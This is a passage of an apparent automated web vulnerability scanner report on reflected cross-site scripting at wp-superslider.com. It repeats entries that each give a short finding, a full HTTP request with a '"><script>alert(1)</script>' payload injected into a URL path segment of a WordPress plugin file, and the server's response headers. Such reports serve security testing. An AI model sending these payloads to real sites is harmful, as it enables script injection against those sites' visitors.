Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:15 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674535+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674536; expires=Thu, 02-Feb-2012 19:22:16 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:16 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4723e"><script>alert(1)</script>03783ed291a was submitted in the REST URL parameter 3. This input was echoed as 4723e\"><script>alert(1)</script>03783ed291a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins4723e"><script>alert(1)</script>03783ed291a/superslider/plugin-data/superslider/ssBase/default/tooltips.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:17 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674537+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674537; expires=Thu, 02-Feb-2012 19:22:17 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:17 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73db0"><script>alert(1)</script>62b356dcb5e was submitted in the REST URL parameter 4. This input was echoed as 73db0\"><script>alert(1)</script>62b356dcb5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider73db0"><script>alert(1)</script>62b356dcb5e/plugin-data/superslider/ssBase/default/tooltips.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:22 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674543+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674543; expires=Thu, 02-Feb-2012 19:22:23 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:23 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53432
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5241"><script>alert(1)</script>51d25023ca8 was submitted in the REST URL parameter 5. This input was echoed as d5241\"><script>alert(1)</script>51d25023ca8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider/plugin-datad5241"><script>alert(1)</script>51d25023ca8/superslider/ssBase/default/tooltips.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674545+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674545; expires=Thu, 02-Feb-2012 19:22:25 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:25 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8644"><script>alert(1)</script>624f801cac1 was submitted in the REST URL parameter 6. This input was echoed as f8644\"><script>alert(1)</script>624f801cac1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider/plugin-data/supersliderf8644"><script>alert(1)</script>624f801cac1/ssBase/default/tooltips.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:26 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674546+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674546; expires=Thu, 02-Feb-2012 19:22:26 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:26 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7487f"><script>alert(1)</script>5f527290bee was submitted in the REST URL parameter 7. This input was echoed as 7487f\"><script>alert(1)</script>5f527290bee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider/plugin-data/superslider/ssBase7487f"><script>alert(1)</script>5f527290bee/default/tooltips.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:27 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674548+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674548; expires=Thu, 02-Feb-2012 19:22:28 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:28 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d055"><script>alert(1)</script>7ce29bfd1af was submitted in the REST URL parameter 8. This input was echoed as 7d055\"><script>alert(1)</script>7ce29bfd1af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default7d055"><script>alert(1)</script>7ce29bfd1af/tooltips.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:29 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674550+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674550; expires=Thu, 02-Feb-2012 19:22:30 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:30 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53429
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4353"><script>alert(1)</script>abe11ab9e4d was submitted in the REST URL parameter 9. This input was echoed as b4353\"><script>alert(1)</script>abe11ab9e4d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider/plugin-data/superslider/ssBase/default/tooltips.cssb4353"><script>alert(1)</script>abe11ab9e4d HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:31 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674551+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674551; expires=Thu, 02-Feb-2012 19:22:31 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:31 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 332e7"><script>alert(1)</script>e7708e26fdc was submitted in the REST URL parameter 1. This input was echoed as 332e7\"><script>alert(1)</script>e7708e26fdc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site332e7"><script>alert(1)</script>e7708e26fdc/wp-content/plugins/wp-downloadmanager/download-css.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:31 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674552+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674552; expires=Thu, 02-Feb-2012 19:22:32 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:32 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53345
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1e60"><script>alert(1)</script>55e2caf15cd was submitted in the REST URL parameter 2. This input was echoed as b1e60\"><script>alert(1)</script>55e2caf15cd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-contentb1e60"><script>alert(1)</script>55e2caf15cd/plugins/wp-downloadmanager/download-css.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:36 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674556+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674556; expires=Thu, 02-Feb-2012 19:22:36 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:36 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53347
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adaa5"><script>alert(1)</script>26cdf719bb4 was submitted in the REST URL parameter 3. This input was echoed as adaa5\"><script>alert(1)</script>26cdf719bb4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/pluginsadaa5"><script>alert(1)</script>26cdf719bb4/wp-downloadmanager/download-css.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:40 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674560+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674561; expires=Thu, 02-Feb-2012 19:22:41 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53347
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd8c0"><script>alert(1)</script>b8bbb170bdf was submitted in the REST URL parameter 4. This input was echoed as dd8c0\"><script>alert(1)</script>b8bbb170bdf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/wp-downloadmanagerdd8c0"><script>alert(1)</script>b8bbb170bdf/download-css.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674562+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674562; expires=Thu, 02-Feb-2012 19:22:42 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53347
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 867ca"><script>alert(1)</script>99896f8538 was submitted in the REST URL parameter 5. This input was echoed as 867ca\"><script>alert(1)</script>99896f8538 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/wp-downloadmanager/download-css.css867ca"><script>alert(1)</script>99896f8538 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:44 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674564+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674565; expires=Thu, 02-Feb-2012 19:22:45 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53344
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35227"><script>alert(1)</script>3dfa69234d3 was submitted in the REST URL parameter 1. This input was echoed as 35227\"><script>alert(1)</script>3dfa69234d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site35227"><script>alert(1)</script>3dfa69234d3/wp-content/plugins/wp-greet-box/js/functions.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:03 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674584+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674584; expires=Thu, 02-Feb-2012 19:23:04 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53326
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37872"><script>alert(1)</script>78f3e31006f was submitted in the REST URL parameter 2. This input was echoed as 37872\"><script>alert(1)</script>78f3e31006f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content37872"><script>alert(1)</script>78f3e31006f/plugins/wp-greet-box/js/functions.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674585+173.193.214.243; path=/
